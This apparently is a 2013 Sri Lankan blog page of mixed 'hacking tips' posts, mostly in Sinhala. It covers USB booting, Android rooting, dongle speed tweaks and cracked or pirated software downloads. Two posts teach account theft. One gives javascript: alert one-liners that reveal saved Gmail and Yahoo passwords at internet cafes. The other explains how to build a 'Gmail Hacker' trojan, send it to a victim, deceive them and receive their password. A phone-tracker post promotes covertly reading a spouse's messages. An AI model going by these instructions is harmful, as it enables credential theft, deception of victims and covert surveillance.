Sunday, October 6, 2013

Showing posts with label hacking / Tips / Tricks. Show all posts

How To Make A Bootable Usb Flash Drive For Windows 7 Or Windows 8

How To Make A Bootable Usb Flash Drive For Windows 7 Or Windows 8


1st You Have Need 3 Items..

01. 4gb Flash Drive.... 

02. Software For Make Bootable Usb... 


Password=www.fullypcgames.net
How Download This File ? 

  




Follow These Steps.
1) Plug 4gb Flash Drive, 4gb Minimum Size 
2)Run Software "You Have Already Downloaded"
3)Step 2 click browse and select Iso file and click next.
4) Now Select A "USB device".
 
5) Click On " Begin copying ".
 
6) Wait A Few Min For Completing Process.
 

After Complete Process Your Flash Driver Will Be Ready For Boot

Android phone එක root කරන හැටි.

Android phone එක root කරන හැටි.



දැන් කට්ටිය Android smart phone එකක් ගත්ත ගමන් කියන්නේ Phone  එක root කරගන්න ඔනේ කියලා. එ Phone එක Root කර ගත්තාම phone එකෙන් සමාන්‍යයේන් ගන්න පුලුවන් ප්‍රයොජන වලට අමතර වැඩි පහසුකම් phone එකෙන් අපිට ගන්න පුලුවන් නිසාවෙනි. 

මොකක්ද මේ root කරනවා කියන්නේ.


මේ ලිපිය කියවන සමහරක් දෙනා Root  කරනවා කියන දේ පලමු වතාවට අසන්න පුලුවන්. එක නිසා Root කිරිම කියන්නේ මොකක්ද කියලා ඉස්සෙල්ල බලමු. Android කියන්නේ Linux පාදක වු OS එකක් එ කියන්නේ PC වලට දාන Ubuntu,open suse වගේ linux මෙහෙයුම් පද්ධතියක්. ගොඩාක් දෙනෙක් PC එකේ OS එක විදිහට භාවිතා කරන්නේ Windows. එ නිසා windows වලින් මෙක පැහැදිලි කර ගමු. Windows PC එක තමන්ට අයිති නම් භාවිතා කරන්නේ Administrator විදිහට. එත් තවත් කවුරු හරි computer එක පාවිච්චි කරන්න ගන්නවානම් අපි එ අයට දෙන්නෙ Gest profile එක හරහා computer එක පාවිච්චි කරන්න. එතකොට Administrator විදිහට අපිට කරන්න පුලුවන් වැඩ Gest profile එකේන් වැඩ කරන කෙනාට කිරිමට නොහැකි වෙනවා එ කියන්නේ පහසුකම් සිමා සහිතයි. අපි Android phone එකක් ගත්තාම එක අපිට පාවිච්චි කරන්න වෙන්නේ අර Windows වලදි gest profile එකේන් use කරන කෙනෙක් වගේ. එ කියන්නේ අපිට ඇත්ත්ටම Android phone එකෙන් කරන්න පුලුවන් සියලුම වැඩ සාමාන්‍ය විදිහට phone එක තියෙන කොට කරන්න බැරි වෙන්න සිමා කරලයි තියෙන්නේ. මෙ කියන Root කිරිම කරාම අපිට අර Administrator කෙනෙක් වගේ phone  එක හසුරුවන්න පුලුවන්.

අපි phone එක root කර ගත්තාම ඇත්තෙන්ම අපිට වාසි දායකයි. root කරාම phone එකෙ bloatware disable කිරිම, os එකෙ සියලුම files හැසිරවිම්, ඔනැම app එකක් install කිරිම හා permissens සැකසිම firewall එකක් run කිරිම... වැනි ඔනැම දෙයක් නිදහසේ කරගන්න පුලුවන්.

Phone එක root කරන්න අවශ්‍ය දෙවල්


1.Java JDK සහ Android SDK computer එකේ install කරලා තියෙන්න ඔනේ

Click to Download >> Java JDK  
 
Click to Download >> Android SDK

2.phone එකත් එක්ක එන data cable drivers PC එකට install කරලා තියෙන්න ඔනේ 


3.SuperOneClick කියන software එක. එක Click >> Super One Click එකේන් download කර ගන්න පුලුවන්

ඉස්සෙල්ල android phone එකේ settings--->applications--->Development පත් එකේන් ගිහින් USB debugging යන්න enable කරන්න.

දැන් phone එකේ SD card එක ගලවලා phone එක data cable එකෙන් Computer එකකට connect කරන්න

දැන් computer එකට install කරගත්ත superoneclick open කර ගන්න. Root කියන button එක click කරන්න



ඉට පස්සේ phone එක Root වෙන්න පටන් ගනිවි. අවසානයේ test run එකක් කරන්න dialog box එකක් පෙන්වාවි. එහිදි yes ලබාදි run test එකක් සිදු කර බලන්න.



දැන් Root කිරිම  ඉවරයි. phone එක restart කරලා බලන්න  අලුතේන් SuperUser binary phone එකට install වෙලා තියෙවි. එක හරහා ඔයාට android phone එකේ root access කරන්න පුලුවන්.

දැන් වැඩේ හරිනේ ? :)

Cell phone tracker turbo 2.89 Full free Download

Cell phone tracker turbo 2.89 Full free Download

 

Cell phone tracker can help you to find a phone for FREE. You can view and track the location of your lost phone on the map, even if the GPS is not connected.


The next time you ask wheres my droid, you'll have an answer in minutes using our cell phone locator. It`s a phone tracker pro made for you!

▌ CELL PHONE TRACKER FREE FEATURES - track a cell phone

All FREE accounts are elegible for 7 days full trial for cell phone tracker for 1 (ONE) device (included your own). But don’t worry, because your account will keep FREE (with some limitations) after that. No charges, no credit cards, no hidden fees. But if you want to protect your entire family, consider the Premium version and add up to 5 devices in your account. See FREE features below:

★ Can monitor 1 (ONE) device full for 7 days
★ Full Location Tracking for 7 days
★ Family Messenger UNLIMITED
★ Panic button UNLIMITED
★ Mobile Control Panel UNLIMITED
★ Web Control Panel UNLIMITED
★ Call History for 7 days (view the incoming/outgoing call log)
★ SMS History for 7 days (full sent/received messages)
★ Geofencing alerts for 7 days (if you kids arrived or left a place)
★ Callbacks for 7 days (hear everything around the monitored device)
★ Wipe Functions for 7 days (delete device’s data remotely)

▌ HOW TO TRACK OTHER DEVICE WITH FREE/TRIAL ACCOUNT?

Are you going to make the first app installation on your own phone and would you like to see how it works in a another family member device? No problem. You can monitor any device with ZoeMob installed using your tablet, PC or notebook even with free/trial accounts. Access our Support Area at http://support.zoemob.com for more information.

▌ WHY TO USE CELL PHONE TRACKER?

Find phone using GPS Location (GPS phone tracker technology) and find my phone by cell phone tower signal.

Keep an eye on your phone 24 hours a day, track their movement history and speed as well as the battery and signal levels.

All location and movement information remain recorded in your ZoeMob account and they are showsn on the map at any time with unrestricted viewing and access.

Now you can say to all your friends that phone locator is the ideal solution " to track my phone" and " track my location phone" . After all, nobody wants to lose the cell phone.

▌ USERS' FEEDBACK

“I love this app. My phone is safe now and my privacy too. It’s so important as iTriage to my health today and mr number call block”. Joe Flixster.

▌ CELL PHONE TRACKER PREMIUM FEATURES

Upgrade to Premium Version to keep your family more protected with a very small month subscription. See below a list with exclusive Premium features:

★ Up to 5 family members (devices) in the same account
★ Unlimited Location and GPS Tracking history (since account’s creation)
★ Unlimited Geo-fencing alerts (school, home etc)
★ Unlimited SMS History (full text)
★ Unlimited Callback requests
★ No advertising
★ Priority Support
★ Plus all free features

▌ HAVE QUESTIONS ABOUT CELL PHONE TRACKER?

If you experience problems with cell phone tracker, please don't hesitate to CONTACT US at http://support.zoemob.com. We're unable to help if you only leave a comment on the Google Play.

▌ MORE INTERESTING TOPICS

Most common uses of our app are locating of children, DH Texas Poker, turbo racing league, guncrafter, tracking husband, fast and furious 6 the game, tracking wife, tvcatchup, cellphone locator, tvcatchup for android, despicable me, cellphone tracker, cell phone locator, cell phone tracker free, despicable me, phone tracker free, find my phone, iTriage, track a cell phone, turbo racing league, DH Texas Poker,guncrafter, phone tracker app, fast and furious 6 the game, phone tracker free app. So remember: it´s is not a cell phone spy!

If you already have a licensed ZoeMob app installed on your device you don't need install this version of the application.


>> Download <<

 

 How Install this game?

*** you have downloaded Cell phone tracker turbo 2.89
 
01 ) And after that Install the BlueStack application you can get it here below: 
 
Click Download  BlueStack >> BlueStacks 0.7.3.766

your PC OS is Windows Xp ?

 Download This  > Click >> BlueStacks

 

 

Free Astrology Software නිදහස් ජ්‍යොතිෂ මෘදුකාංග Download

Free Astrology Software නිදහස් ජ්‍යොතිෂ මෘදුකාංග Download  

 

 

 පරිඝණක ජ්‍යොතිෂ මෘදුකාංග රාශියක් අන්තර්ජාලය තුල දක්නට ඇත.මින් නිදහස් මෘදුකාංග ඇත්තේ අතලොස්සකි."ජගන්නාත් හෝරා"  හා  "කුන්ඩ්ලි"     නොමිලේ භාගත පහසුකම් සලසා ඇති නිවැරදි ජනප්‍රිය ජ්‍යොතිෂ මෘදුකාංග දෙකකි.පහතින් බාගත කොට බලන්න

Downlaod

ආනගතය ගැන දැන ගන්න Software එකක් මෙන්න​

ආනගතය ගැන දැන ගන්න සාස්තරයක් බලමු Teller of future 

 

හප්පා මෙ දවස් වල මාර විදියට වැඩ බොලොග් එක පැත්තෙ එන්නත් බැරි උනා. ඉතින් කස්ටිය හොදින් නෙ ? හා 2012 යනවා නෙ ? කැමති නැද්ද 2012 ඔයාට කොහොමද කියලා දැන ගන්න ? එකට ඉතින් එක්කො ලග්න පලාපල බලන්න ඔන නැත් නම් සස්තරයක් අහන්න ඔන නෙ ?පිස්සු හැදෙනවා   කැමතිද තමන් ගැනත් හොයා ගෙන අනික් අයගෙ අනාගතෙ ගැනත් කියල දෙන්න ? ඔන්න දැන් තමයි වැඩෙට බැස්සෙ නෙද ? මෙක මැxසා සොෆ්ට් එකක් සින්හලෙන් තමයි තියෙන්නෙ එක නිසා කඩ්ඩ ඔනෙත් නැ දා ගෙන බලන්නකො

01. මුලින්ම මෙ rar file එක බා ගෙන  අන් පැක් කර ගන්න Dwonload

02.SETUP.EXEඉට පසසෙ සස්තර කියන folder එක open  කරල SETUP.EXE  file එක run  කරන්න. 

03.ඉලගට මෙක crack  කරගන්න TOF Patch  folder කියලා එකක් තියනවා නෙ. එක open කරන්න 

04.TOF Patch.exe කියලා තියන exe file එක run  කරන්න වැඩෙ ගොඩ. 

දැන් soft එක run කරලා බලන්න. සින්හලෙන් නොතිබුනොත් විතරක් fm_deran.TTF   font එකකුත් දාලා තියනවා එක rightcick  කරලා ඉන්ස්ට්‍රොල් කර ගන්න දැන් එහනම් සස්තරයක් කියනත් පුලුවන් නෙ ගිහිල්ල එනනම් .

MP3 වලින් Voice එක අයින් කරමු (Music Track)

MP3 වලින් Voice එක අයින් කරමු (Music Track) 

 

මේ දවස් වල වෙසක් එකට භක්ති ගීත වගයක් හොයන කොට මට ඒවාගේ Music Track  (Instrumental Track) එක විතරක් ඕනි වුනා ගන්න.ඒත් Internet search කලාට ගොඩක් Songs වල Music Track එක විතරක් ගන්න තිබුන් නෑ. කොහොම හරි Music Track ඕනි නිසා තිබුනු උත්තරෙ වුනේ MP3 Songs වලින් Voice එක අයින් කරන එක තමා. ඒ වැඩේට මම පාවිච්චි කරපු Software දෙකක් ගැන තමා මේ Post එක. කාටහරි ඕනි වුනොත් අරන් බලන්නකො.පළවෙනි Software එක තමා Audacity. මෙතනින් Download  කරගන්න. මේකෙන් Music Track එක ගන්න විදිහ තමා මේ.

step 1 > Audio File එක open කරගන්න.                       step 2 > Split Stereo Track එක Select කරන්න.



step 3 > Effect Menu එක Select කරලා Vocal Remover  Select කරන්න





දෙවන Software එක තමා MP3 Karaoke. මෙතනින්  Download  කරගන්න. මේකෙ නම් කරන්න වැඩිය දෙයක් නෑ Track එක Add කරලා Make Karoke File දුන්නාම Music Track (Instrumental Track)එක හැදෙනවා.



මතක තියාගන්න ඕනි දේ තමයි පාවිච්චි කරන Track එකේ quality එක සහ MP3 ීSong එකේ Voice track එක එකතු කරලා තියෙන විදිහ (Encoded Method) අනුව Music Track එකෙ quality එක වෙනස් වෙනවා කියලා. තව මීට වඩා හොඳ Software ගැන දන්න යාළුවො ඒවා ගැනත් comment කරලම යන්න.
 

IDM එකෙන් බෑ..වත් ස්පීඩ් එක මඳි වගේද.. එහෙනම් තවත් වේගෙ වැඩිකරගන්න

IDM එකෙන් බෑ...වත් ස්පීඩ් එක මඳි වගේද.. එහෙනම් තවත් වේගෙ වැඩිකරගන්න
ගොඩක් අයට තියෙන අමාරුවක්නේ කොච්චර speed එකකින් download උනත් ඒ download වෙන්න ගිය කාලය වැඩියි කියන එක. මටත් තියෙනවා ඔය සීන් එකනම්. ඒක නිසා ඔන්න අද දෙන්න යනවා කලින් internet speed කරගන්න හැටි කියල දුන්න වගේ IDM එහෙමත් නැත්නම් Internet Download Manager වල download speed එක වැඩි කරගන්න පොඩි ගැජට් එකක්.  මේ වැඩෙන් අඩු කනෙක්ෂන් එකක් තියෙද්දි උනත් සාමාන්‍යය download වේගයට වඩා වේගයක් එකතු වෙනවා. 


ඉතිං මේකෙ නම තමයි IDM Optimizer. ඉතිං මේකෙන් වැඩ ගන්නෙ කොහොමද කියලා දැන් බලමු. ගොඩක් දේවල් නම් කරන්න නෑ.
01. පහළින් දීල තියෙන link එක පාවිච්චි කරලා software එක බාගන්න.
02. RAR file එක Extract කරගන්න.
03. දැන් IDM එකෙන් Download වෙන්න දාල තියෙන ඒවා cancel කරලා, IDM එක Task bar එකෙනුත් අයින් කරන්න. කොටින්ම කීවොත් දැන් IDM එක ඔයාගෙ PC එකේ වැඩ කරන්නෙ නැති වෙන්න ඕනි.
04. දැන් IDM Optimizer කියන එක open කරගන්න.
05. දැන් “Maximize Now !” කියන button එක උඩ click කරන්න. 
06. දැන් speed එක වැඩිවෙලා තියේවි. තත්වය පරීක්ෂා කරගන්න මොකක් හරි එකක් Download කරලම බලන්න.
මම පොරොන්දු වෙන්නෙ නෑ මේකෙන් ඔයාගෙ දැනට තියෙන speed එක දෙගුණයකින් වැඩිවෙනවා කියලා.. හැබැයි 150%ක් විතර අනිව වැඩිවෙනව හොඳේ. 
පහළින් ගැඩට් එක බාගන්න.
                      Password :> www.downloadgame4pc.blogspot.com

ඩොන්ගල් Speed එක වැඩි කරගන්න



































































































































        



 බ්ලොග් එක පැත්තට පොඩි පොස්ට් එකක් දාන්න ඔන කියලා හිතුනා.
කට්ටිය කැමතිද Internet-Dongle Speed එකක් වැඩි කරගන්න කරගන්න මොකද කියන්නේ වැඩේ නම් :D තමා මුලින්ම කියන්න ඔන මම නම් use  කරන්නේ"dialog"  3Connect & >>Windows 7  .
නමුත් ඩොන්ගල් එක මොකක් උනත් අවුලක් නැ මම කියන විදිහට වැඩේ කරගන්න XP වලට නම් මෙ ක්‍රමය කොහොමද යොදාගන්නේ කියලා මම බැලුවේ නැ මම හිතනවා කට්ටියම දැන් Use කරනවා ඇත්තේ Windows 7 කියලා ඔන්න එක නිසාම මම වැඩේ Screen Shots වලින්ම පැහැදිලි කරලා දෙන්නම්

.මුලින්ම කියන්න ඔන Net Connect කරලා නම්  Disconnect කරගන්න . දැන් පහත ඇති Screen Shots.

 "Control  Panel යන්න එහි ඇති Phone and Modem කික් කරන්න"
" 1 "
 
මුලින්ම Open Box  එක තුලට 94  type කරලා OK කරගන්න . 
 
දැන් පහත රූප රාමු වල දැක්වෙන විදිහට වැඩේ කරගන්න
 
"2"
රූප රාමු පැහැදිලි මදි නම් රූප රාමු මත කික් කරන්න
"3"
 
"4"
 
"5"
 
Advanced  ටැබ් එකට ගිහින් AT&FX ලෙස Type කර OKකරන්න 
 
 
" *6 "
 
රූප රාමු පැහැදිලි මදි නම් රූප රාමු මත කික් කරන්න
 
ඔයාට දකින්න පුලුවන් පහත  රුප සටහනේ දැක්වෙන සේ ඔයාගේ Start  බාර් එක තුල Time ටැබ් එක අසල තියෙන Internet Access Icon එක ඒ මත කික් කරන්න
 
" *7 "
Right Click කරන්න ඔයාගේ  Connection එක මත
 
                                                                             " *8"

                                                                 Properties මත කික් කරන්න

                                                                        " *9 "
                                                     
                                                    921600  දාලා OK කරගන්න

                                "  දැන් හරි ඔයාගේ එක තිබුනාට වඩා වේගවත් වෙලා ඇති "
 
  තව දෙයක් කියන්න තියෙනවා ඔයාලා Net Connect  වෙනවා නම් ඩොන්ගල් Soft එකෙන් Net Connect වෙන්නෙ නැතුව. Start බාර් එකේ Time  ටැබ් එක එකට අසල තියෙන අපි මුලින් වෙනස් කරන ලද  Internet Access   එක මත කික් කරලා  ඔයාගේ (Connection ඩොන්ගල් name) එතන පෙන්වනවා ඒ මත Right Click කරලා Connect  දෙන්න.

"ස්පිඩ් එක බලන්න ඔනෙ නම් Internet Access >>Connection මත right click කරන්න >>status Click කරන්න දැන් වේගය බලාගන්න පුලුවන් .

*  කට්ටියටම කියන්න කැමති මගේ Freedom Of Life අඩවියේ මිතුරෙක් විදිහට Followers එකට එකතුවෙන්න කියලා. 
 

ඕනම සිම් එකකින් හයිස්පීඩ් ඉන්ටනෙට්... High speed Internet...පටපට ගාල ඩවුන් කරගන්න...

ඕනම සිම් එකක් ඔට්ටුයි... High speed Internet...පටපට ගාල ඩවුන් කරගන්න... 



සමහරු හදවතින්ම ලාoකිකයිලු... තවත් අය වී කෙයා ඕල්වේස් ලු.. තවත් අය එක්ප්‍රස් යුවර් සෙල්ෆ් ලු.... එතකොට ජිල්මාට්ස් ...? ළග මේ තුනම තියනවද කොහෙද... එහෙම උණාම මොකක්ද ...? "තුන් වේලටම ඉන්ටනෙට්"... ෂා... ඒක මරු...
එයාටෙල්....මල් කඩන්න.., මොබිටෙල් ෆ්‍රෙන්ඩ්ස්ල අතරෙ..., ඩයලොග්.. ගෙදරට.. මේ හැම එකක්ම ජිල්මාට්ස්ගෙ ඩොන්ගල් එකටත් වැටෙනව...මේ මොක වැටුනත් ජිල්මාට්ස්ගෙ ඉන්ටනෙට් ස්පීඩ් එක පට්ටයි කියලයි ජිල්මාට්ස්ගෙ කතාව...මේකනම් පට්ටම වැඩක් හින්ද පිටකරන්නෙ නැහැ කියල හිතන් හිටියත් කෙල්ලෙක් ඇහුවොත් නම් එළියට පනීද කියලත් ජිල්මාට්ස්ට සැකයි.. මොනව කරන්නද..? බලෙන් ගන්නයැ.. බලමුකො..
ඕනම සිම් එකකින් හයිස්පීඩ් ඉන්ටනෙට් යන්නනෙ ඕන.. දෙන්නම් වැඩක්...

 1. start > Control Panel > network connections

 2. දැන් ඕකෙන් network connection එක right click කරල > Properties

 3.  Network >  සිලෙක්ට් Internet Protocol (TCP/IP) > properties

 4. use the following DNS server එකට ටික් එකක් දාන්නකෝ...

 5. Preferred DNS server  එකට 198.153.192.1

    Alternate DNS server එකට 198.153.194.1 
දීල OKකරන්නකෝ...

හරි... දැන් වැඩේ හරි.. 
මතක තියා ගන්න ඔයා ඩොන්ගල් එක ප්ලග් කලාට ඒකෙන් කනෙක්ට් වෙන්න යන්න එපා.. මේ network connection එකෙන් connect කරන්න...

පට පට ගාල බාගන්න.. අන්ලිමිටඩ් ස්පීඩ් එකේ ආතල් එකේ ඉන්ටනෙට් යන්න.. පට්ටයි නේ...? 

E303 Huawei Dongle Unlock ඉදිරියට එන හැම Dongle එකම Unlock කරන්න​

E303 Huawei Dongle Unlock ඉදිරියට එන හැම Dongle  එකම Unlock කරන්න​


තාම ඔයාගේ Huawei Dongle එක Unlock කර ගන්න බැරිවුණාද?
 අපි මේ Thread එකෙන් දැනට තියෙන හා ඉදිරියට එන Huawei Dongle Unlock කරන්න පුලුවන්. 
. නමුත් මේ දවස් වල ජනප්‍රිය වෙලා තියෙන්නේ Huawei E303 Dongle එකනේ.
 . ගොඩක් දෙනාට ඕනවෙලා තියෙන්නේ Unlock Codes නේ. 
එහෙනම් ඔයාලගේ E303 Dongle වල IMEI ටික මේ Tool එකට දාල කර Unlock ගන්නකෝ
 මෙතනින් Download කර ගන්න​ >> Download

Gmail & Yahoo mail හැක් කරමුද?

Gmail & Yahoo mail හැක් කරමුද? 






අපි වෙබ් සයිට් එකකට ගියපුවහම රෙජිස්ටර් වෙන්න තියෙනවනම් ගොඩක් දුරට තරැ(*) සළකුණ හරි කලුපාට පොඩි බිංදුවක් වගේ දෙයක් තමා පේන්න තියෙන්නේ. ඉතිං සමහර වෙලාවට අපි කැෆේ එකකින් වගේ ලොග් වෙනවනම් අපිට හොරවැඩ කරන්නත් මේ ක්‍රමය ගොඩක් උදව්වෙනවා.
හොරවැඩ කරන්න කිව්වේ අපි කැෆේ එකකින් ඔන්න ඉන්ටනෙට් ලොග් වෙන්න සීට් එකේ ඉදගත්තා. ඊට පස්සේ අපි ජීමේල් එකවුන්ට් එකට ලොග් වෙන්න යනවා. එතන ඊට කලින් හිටපුකෙනා ඒ පාස්වර්ඩ් එක සේව් කරලා ගිහිල්ලා. අපි ඉතිං හෙන ජොලියේ අපි ආපු වැඩෙත් අමතක කරලා ඒකට ලොග් වෙනවා. බලද්දී ඒ එකවුන්ට් එකේ තියෙන දත්ත අපිට ගොඩක් උවමනා වෙනවා. ඉතිං අපිට ඒ පාස්ව්ඩ් එක දැනගන්න වෙනවා ලොග් වෙන්න. ඉතිං මේ ක1මේ භාවිතා කරලා ඒකට ලොග් වෙන්න පුලුවන්. තවත් ඔයාලට ඕන ඕන දේවල් වලට මේක යොදාගන්න පුලුවන්. එහෙනම් බලමු කරන හැටි.
ඉස්සෙල්ලම ඔයාට ඕනි වෙබ් සයිට් එකට යන්න. අපි උදාහරණයටත් ජීමේල් අරන් තියෙන හින්දා මෙතනටත් ජීමේල් උදාහරණයක් විදිහට ගමු. 
(01 රෑපය)
01 රෑපය
පින්තූරය අපහැදිලිනම් පින්තූරය මත ක්ලික් කරන්න


ඊට පස්සේ යූසර් නේම් එකයි පාස්වර්ඩ් එකයි ටයිප් කරන්න. නැත්නම් අර සේව් වෙලා තියෙන එක උනත් කමක් නෑ. (02 රෑපය)
02 රෑපය
පින්තූරය අපහැදිලිනම් පින්තූරය මත ක්ලික් කරන්න

දැන් මේ පල්ලෙහායින් දීල තියෙන ජාවා ස්ක්‍රිප්ට් එක ඇඩ්රස් බාර් එකට කොපි කරගෙන ගිහිල්ලා පේස්ට් කරන්න.

javascript:alert(document.getElementById('Passwd').value)

ඊට පස්සේ පල්ලෙහා විදිහට බ්රව්සර් එකෙන්ම මැසේජ් එකක් එයි.

ඔය ජාවා ස්ක්‍රප්ට් එක ජීමේල් එකට විතරයි පුලුවන්.යාහු මේල් එකේ කොඩ් එක පල්ලෙහායින් මම දානවා. යාහු වලත් කරන්නේ මේ කරපු විදිහම තමයි.
javascript:alert(document.getElementById('passwd').value) 
 
 
 

Gmail Hacker භාවිතයෙන් ජී.මේල් රහස් අංකය සොරා ගැනීම

Gmail Hacker භාවිතයෙන් ජී.මේල් රහස් අංකය සොරා ගැනීම 

 

 
මේක තමා මම නම් භාවිතා කරන ක්‍රමය.හරිම පහසුයි.මේ මෘදුකාංගය භාවිතා කරලා තමන්ගෙම ජී.මේල් හැකර් එකක් හදාගෙන ඒක තමන්ට හැක් කරන්න ඕන කෙනාට යවන්න.ඕන කෙනෙක් හැක් කරන්න කැමතිනේ ඒක නිසා නිකම්ම යවන්න පුලුවන්.ආර්ඩමැක්ස් කීලොගර් සහ වින්ස්පි කීලොගර් භාවිතා කරලත් ජී.මේල් හැක් කරන්න පුලුවන්.ඒත් මම මේ දෙන මෘදුකාංගය භාවිතා කිරීම ඉතා පහසුයි.

දැන් අපි බලමු කොහොමද වැඩේ කරන්නේ කියලා.......


1 පියවර-ඉස්සෙල්ලාම ජී.මේල් හැකර් මෘදුකාංගය බාගන්න ඕන.ඒකට මෙතන ඔබන්න. (රහස්‍ය අංකය-hackingclz)


2 පියවර-ඊට පස්සේ Win Rar බාගන්න.(ඔයාල ගාව තියෙනවනම් ඕන නෑ)නොමිලේ බාගැනීමට මෙතන ඔබන්න.


3 පියවර-දැන් විවෘත කරන්න.එතකොට මේ විදිහට පෙනෙයි.

 
4 පියවර-දැන් ඔබේ ඊ මේල් ලිපිනය හා පාස්වර්ඩ් එක මේ වින්ඩෝ එකේ කොටන්න.(වැදගත්-කිසි විටෙකත් ඔබ භාවිතා කරන ඊ මේල් ලිපිනය මේ සඳහා යොදා නොගන්න.මේ සඳහා වෙනම ඊ මේල් ලිපිනයක් යොදාගන්න)ඉන පසු Build යන බොත්තම ඔබන්න.එවිට ඔබට වෙන කෙනෙකුගේ ජී.මේල් හැක් කිරීම සඳහා අවශ්‍ය වන ගොනුව එම ස්ථානයේම ගොඩ නැගේ.එහි නම-Gmail Hacker.exe



5 පියවර-දැන් තියෙන්නේ ඒ ගොනුව හැක් කරන්න ඕන කෙනාට යවන එකයි.එයාට කියන්න ජී.මේල් හැක් කරන්න අලුත් මෘදුකාංගයක් හොයා ගත්තා කියලා.එයා ඒක විවෘත කරලා වෙන කෙනෙක්ව හැක් කරන්න හිතලා එයාගේ විස්තර ටික කොටලා Hack Them කියන බොත්තම ඔබපුවාම මේ Error එක එනවා.



එතකොට එයා කියයි මෙහෙම එකක් එනවා කියලා.ඔයාට තියෙන්නේ ආ එහෙමද?මගෙනම් එහෙම එකක් අවේ නෑ කියන්න.

6 පියවර-ඒ වෙනකොටත් ඔයා මුලින්ම දුන්න ඔයාගේ ඊ.මේල් එකට එයාගේ ඊ.මේල් එකේ විස්තර(රහස්‍ය අංකය) ඇවිල්ලා තියේවි.මෙන්න මේ විදිහට.

 

7 පියවර- දැන් ඔයාට තියෙන්නේ එයාගේ රහස්‍ය අංකය වෙනුවට ඔයාට කැමති අංකයක් දාගන්න එක විතරයි.

මේක 100% සාර්ථකව වැඩ කරනවා.  



facebook එකෙ පාට පාට අකුරු type කරමු

facebook එකෙ පාට පාට අකුරු type කරමු



මෙන්න cord ටික

උදාහරනයක් ලෙස ඔයට type කරන්න ඔනෙ computer tricks කියල
 මේවිදියට type කරන්න........

COMPUTER: [[115602405121532]] [[116564658357124]] [[106596672714242]] [[111669128857397]] [[108983579135532]] [[112669162092780]] [[115430438474268]]  [[106699962703083]]

 TRICKS: [[112669162092780]] [[106699962703083]] [[109294689102123]] [[115602405121532]] [[116651741681944]] [[115927268419031]]

[[107015582669715]] = A

[[116067591741123]] = B

[[115602405121532]] = C

[[112542438763744]] = D

[[115430438474268]] = E

[[109225112442557]] = F

[[111532845537326]] = G

[[111356865552629]] = H

[[109294689102123]] = I

[[126362660720793]] = J

[[116651741681944]] = K

[[115807951764667]] = L

[[106596672714242]] = M

[[108634132504932]] = N

[[116564658357124]] = O

[[111669128857397]] = P

[[107061805996548]] = Q

[[106699962703083]] = R

[[115927268419031]] = S

[[112669162092780]] = T

[[108983579135532]] = U

[[107023745999320]] = V

[[106678406038354]] = W

[[116740548336581]] = X

[[112416755444217]] = Y

[[165724910215]]        = Z

Picture


කරලම බලන්නකො

Android Phone එකක් ඔයලටත්

Android Phone එකක් ඔයලටත්





අද ඔයාලාට දෙන්නෙ නියම software එකක්.software එකක්  කිව්වට  මේක os එකක්,..  ඔයාලා  හැමෝම දන්නවනෙ android ගැන..අද වෙනකොට ලෝකයේ  ජනප්‍රියම Mobile Os එක තමා Android..මේකට හේතුව තමා මේක open source වීම.මේක open source නිසා  ඕනතරම් Apps තියනවා Net එකෙ Download කරගන්න..... .ඔයාලාට උනත් App හදල විකුනන්න පුලුවන්. .

මේක හිතපුනැති විදිහට ජනප්‍රිය  වුනනිසා Nokia වලට තමා බඩෙ පාරවැදුනෙ හැබැයි පොඩි ආරන්චියකුත් තියනවා Nokia සද්ද නැතුව ඉන්නෙ.Android ගෙදර යවන්න Os එකක් ගහනවා කියලා.  ඕවා ඉතින් ආරන්චි හොදේ  ....... :) හැබැයි කොච්චර ජනප්‍රිය උනත් අපිට කොහෙන්ද  ඕවා  ගන්න සල්ලි..  ඒක නිසා මම net එකේ පොඩි search පාරක්  දැම්මා එතකොට  තමා මේක හම්බ  උනේ.මේකෙ වටිනකමනම් කියල වැඩක්නැ ......
                    මේක දපුහම  ඔයලගෙ  PC එක පෙන්නෙ Android Phone එක වගෙ....බය වෙන්න කිසිම දෙයක්නැ මෙකෙන් ඔයලගෙ ඵ්ක් PC එකෙ දලා තියන OS එකට මොකුත් වෙන්නැ..ඕනවෙලාවට Double Click කරලා Open කරන්න විතරයි තියෙන්නෙ..Android apps ඕනතරම් Download කරගන්න පුලුවන්.  
                                                                                                   Facebook,Skype,Navigator,Games,Google map වගෙ  ඕනෑම දෙයක් මෙකෙන් Use කරන්න පුලුවන්....  මේකෙන්ම  ඔයාලට Android marketplace එකට ගිහින් ඔයාලට ඕන App එකක් Download කරගන්න පුලුවන්... ඔයා ට බලන්න photos ටිකකුත් දැම්මා....



HOME එක මෙන්න 
මේක ඉතින් මොකද්ද කියල හැමෝම දන්නවනේ    .....:)
App Download 
Apps වැඩත් කරනව හොදෙ ....:D

Sky Radio එහෙමත් වැඩ හොදෙ ...


එහෙනම් ඔයාලා බාගෙනම බලන්නකො කොහොමද කියලා ......අපි ගියා....
ඔයාලා  යනකොට  පුන්චි comment එකක් දාලා යන්න හොදේ  ......:)


               මෙතනින් ගන්න 
                        DOWNLOAD
             

No comments:

Post a Comment